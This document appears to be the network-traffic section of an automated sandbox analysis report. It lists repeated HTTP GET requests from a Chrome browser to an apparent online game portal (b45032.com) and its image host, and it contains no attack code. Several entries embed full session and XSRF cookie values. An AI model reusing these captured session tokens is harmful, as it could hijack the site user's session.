XSRF-TOKEN=eyJpdiI6InQwSDJDR2I4ekhWMXhTek1VNFozM1E9PSIsInZhbHVlIjoiM0JjMFRwTWFMUnJ5MVE3Z20yaUNZWmNrb29yRmxWQUdHcEhIZUk2Tmc5cFgwVko0XC9MZG1jNm9MKzFoUzJaNWEyMDh5ZEJNbmhWTkh1RHp3RldXNjNnPT0iLCJtYWMiOiJmZGYxYzIwNjgxZjVhOWYwNmY5NmFmNDc4ZWIyYWUyNTkyOWIzODcyN2M5Yzg5MjEzNDczMDIxMWU0ZjNiOGNkIn0%3D; vanguard_session=eyJpdiI6ImNlWTFldmthSVdEeWM2WjFYS054aFE9PSIsInZhbHVlIjoieDlwXC9mWGVLZGdcL3ZDenlSMHhwUWNcLzkzeTlvXC9hZmRrMXl1U3BwdXIxZ3FlY1NXckVzTjFDYnB6VU93dXRqQldVRWpPaExvNUJUeVE5bWJxMU9oQnV3PT0iLCJtYWMiOiJiMzBmNTQyNzlkZGIxOGViOTFlM2RhYzUzNTkzZGNiMzAzN2FlNGUyMDJiMGY2OTg3NjJhZWE4NGJhNzBiN2NlIn0%3D
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=224&page=1&cates%5B%5D=802&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InVnN1hzOWRkakdRTGljT2RvWW9vXC9RPT0iLCJ2YWx1ZSI6Ik1SbmZsN2IwMHdaV256RkE3N1QwMGhWdkZJNkY1XC80K21FT1wvb2lWTUQwam9hNjNUemNHNUNGS3pDMEtcL3V3NHNjSG5VWXIwWTYwVWN2bm5cL1poelJCZz09IiwibWFjIjoiZjYzN2NlOWU2Mzc4NjcwZGM5MGNjOGIzMjIyNTFkMzQ1MDE1MmY2MGEwNmE3MWQ3MmVkYjlkZDI2YjVkMzFlNCJ9; vanguard_session=eyJpdiI6Ikw3MFwvQzh1cWNiYnRGU1Z4WlZKbjFnPT0iLCJ2YWx1ZSI6IjM4TUhjbDRYOTlkSDFlcjdVZXVaMiszWnpMNnVQVTBXcENkYjMrRTg1OWJtRHRXZ3BQNnZSUWtOY0QyQmgzenlwWTlMUzdvUlVxMWx0VUVRbTk2dkF3PT0iLCJtYWMiOiJjMGQyN2QxNzllYjk2YTllNGI0NjRjNDI5MGI5OTc0MWU4MjkyMWViMmI5Nzk1Y2Q2MTcwYTIzM2I1OTY2OThiIn0%3D
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/93_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/196_egame_logo.png?ver=1673578660 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/136_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getcatlist/224 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InVnN1hzOWRkakdRTGljT2RvWW9vXC9RPT0iLCJ2YWx1ZSI6Ik1SbmZsN2IwMHdaV256RkE3N1QwMGhWdkZJNkY1XC80K21FT1wvb2lWTUQwam9hNjNUemNHNUNGS3pDMEtcL3V3NHNjSG5VWXIwWTYwVWN2bm5cL1poelJCZz09IiwibWFjIjoiZjYzN2NlOWU2Mzc4NjcwZGM5MGNjOGIzMjIyNTFkMzQ1MDE1MmY2MGEwNmE3MWQ3MmVkYjlkZDI2YjVkMzFlNCJ9; vanguard_session=eyJpdiI6Ikw3MFwvQzh1cWNiYnRGU1Z4WlZKbjFnPT0iLCJ2YWx1ZSI6IjM4TUhjbDRYOTlkSDFlcjdVZXVaMiszWnpMNnVQVTBXcENkYjMrRTg1OWJtRHRXZ3BQNnZSUWtOY0QyQmgzenlwWTlMUzdvUlVxMWx0VUVRbTk2dkF3PT0iLCJtYWMiOiJjMGQyN2QxNzllYjk2YTllNGI0NjRjNDI5MGI5OTc0MWU4MjkyMWViMmI5Nzk1Y2Q2MTcwYTIzM2I1OTY2OThiIn0%3D
Source: global trafficHTTP traffic detected: GET /csrf HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InVnN1hzOWRkakdRTGljT2RvWW9vXC9RPT0iLCJ2YWx1ZSI6Ik1SbmZsN2IwMHdaV256RkE3N1QwMGhWdkZJNkY1XC80K21FT1wvb2lWTUQwam9hNjNUemNHNUNGS3pDMEtcL3V3NHNjSG5VWXIwWTYwVWN2bm5cL1poelJCZz09IiwibWFjIjoiZjYzN2NlOWU2Mzc4NjcwZGM5MGNjOGIzMjIyNTFkMzQ1MDE1MmY2MGEwNmE3MWQ3MmVkYjlkZDI2YjVkMzFlNCJ9; vanguard_session=eyJpdiI6Ikw3MFwvQzh1cWNiYnRGU1Z4WlZKbjFnPT0iLCJ2YWx1ZSI6IjM4TUhjbDRYOTlkSDFlcjdVZXVaMiszWnpMNnVQVTBXcENkYjMrRTg1OWJtRHRXZ3BQNnZSUWtOY0QyQmgzenlwWTlMUzdvUlVxMWx0VUVRbTk2dkF3PT0iLCJtYWMiOiJjMGQyN2QxNzllYjk2YTllNGI0NjRjNDI5MGI5OTc0MWU4MjkyMWViMmI5Nzk1Y2Q2MTcwYTIzM2I1OTY2OThiIn0%3D
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/11_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/173_egame_logo.png?ver=1698829779 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=224&page=1&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InVnN1hzOWRkakdRTGljT2RvWW9vXC9RPT0iLCJ2YWx1ZSI6Ik1SbmZsN2IwMHdaV256RkE3N1QwMGhWdkZJNkY1XC80K21FT1wvb2lWTUQwam9hNjNUemNHNUNGS3pDMEtcL3V3NHNjSG5VWXIwWTYwVWN2bm5cL1poelJCZz09IiwibWFjIjoiZjYzN2NlOWU2Mzc4NjcwZGM5MGNjOGIzMjIyNTFkMzQ1MDE1MmY2MGEwNmE3MWQ3MmVkYjlkZDI2YjVkMzFlNCJ9; vanguard_session=eyJpdiI6Ikw3MFwvQzh1cWNiYnRGU1Z4WlZKbjFnPT0iLCJ2YWx1ZSI6IjM4TUhjbDRYOTlkSDFlcjdVZXVaMiszWnpMNnVQVTBXcENkYjMrRTg1OWJtRHRXZ3BQNnZSUWtOY0QyQmgzenlwWTlMUzdvUlVxMWx0VUVRbTk2dkF3PT0iLCJtYWMiOiJjMGQyN2QxNzllYjk2YTllNGI0NjRjNDI5MGI5OTc0MWU4MjkyMWViMmI5Nzk1Y2Q2MTcwYTIzM2I1OTY2OThiIn0%3D
Source: global trafficHTTP traffic detected: GET /images_plus/other/en/right1.jpg HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6InVnN1hzOWRkakdRTGljT2RvWW9vXC9RPT0iLCJ2YWx1ZSI6Ik1SbmZsN2IwMHdaV256RkE3N1QwMGhWdkZJNkY1XC80K21FT1wvb2lWTUQwam9hNjNUemNHNUNGS3pDMEtcL3V3NHNjSG5VWXIwWTYwVWN2bm5cL1poelJCZz09IiwibWFjIjoiZjYzN2NlOWU2Mzc4NjcwZGM5MGNjOGIzMjIyNTFkMzQ1MDE1MmY2MGEwNmE3MWQ3MmVkYjlkZDI2YjVkMzFlNCJ9; vanguard_session=eyJpdiI6Ikw3MFwvQzh1cWNiYnRGU1Z4WlZKbjFnPT0iLCJ2YWx1ZSI6IjM4TUhjbDRYOTlkSDFlcjdVZXVaMiszWnpMNnVQVTBXcENkYjMrRTg1OWJtRHRXZ3BQNnZSUWtOY0QyQmgzenlwWTlMUzdvUlVxMWx0VUVRbTk2dkF3PT0iLCJtYWMiOiJjMGQyN2QxNzllYjk2YTllNGI0NjRjNDI5MGI5OTc0MWU4MjkyMWViMmI5Nzk1Y2Q2MTcwYTIzM2I1OTY2OThiIn0%3D
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/76_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/271_egame_logo.png?ver=1605689921 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/160_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/78_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/218_egame_logo.png?ver=1692209012 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/217_egame_logo.png?ver=1692209012 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/221_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/59_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/172_egame_logo.png?ver=1669192658 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/224_egame_logo.png?ver=1711946581 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/159_egame_logo.png?ver=1713931261 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/197_egame_logo.png?ver=1673578619 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/common/search.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plus/css/custom/egame_custom.css?ver=1736392866Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/136_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/196_egame_logo.png?ver=1673578660 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/93_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/11_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/78_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/egame/nav/160_egame_logo.png?ver=1606790110 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /getegame?platform%5B%5D=224&page=1&cates%5B%5D=802&gamename=&gameid= HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IkVxVXJRb3pZSVVcLzZWeVJEcXphSjlRPT0iLCJ2YWx1ZSI6IkRLRGQwR05ES2VhSmUxNHhUb1ZPN3lrY2xkVmJWODJBSVc2Q0ZMaTZSR09RalIra0VzcXRvK2hhamRMZGxyV09DVlkrM2JwTlwvTEkyR2t0c2RmSlRWZz09IiwibWFjIjoiYjFiNWY1ODA1ODQ1NjAyN2ZlZWIxYTdjN2M5N2QxYmM1NTU1N2NjN2NiOWEzNDY3OGNmMWM1N2M3MTZmY2Y4YiJ9; vanguard_session=eyJpdiI6Imh4V2dpa1E1YkRwZmE1bVMyXC9HWnhnPT0iLCJ2YWx1ZSI6IjJCNmFHbFJVU25kdmFxWThiemlqRUFiMUJCSXozTEd5enRaTjRvUHlrTFRYQnJJNkY0N3NyZGRmamwzNlwvbkhjY09jb1B1a1JrbnJaQlpwQUR0a2d1Zz09IiwibWFjIjoiMGQ2ZGUyMDliZTRlMWRhYmIxZjYwNDZjZTVkZjBjYWEzMGViN2ZmMzY5OTI4YTU3ODVkMmQyMjdiM2M4OTM1MiJ9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/sky/sw_dhcf.png?ver=1691141966 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/xin/802.png?ver=1664356540 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/game/egame/jdb/9020.png?ver=1715740152 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
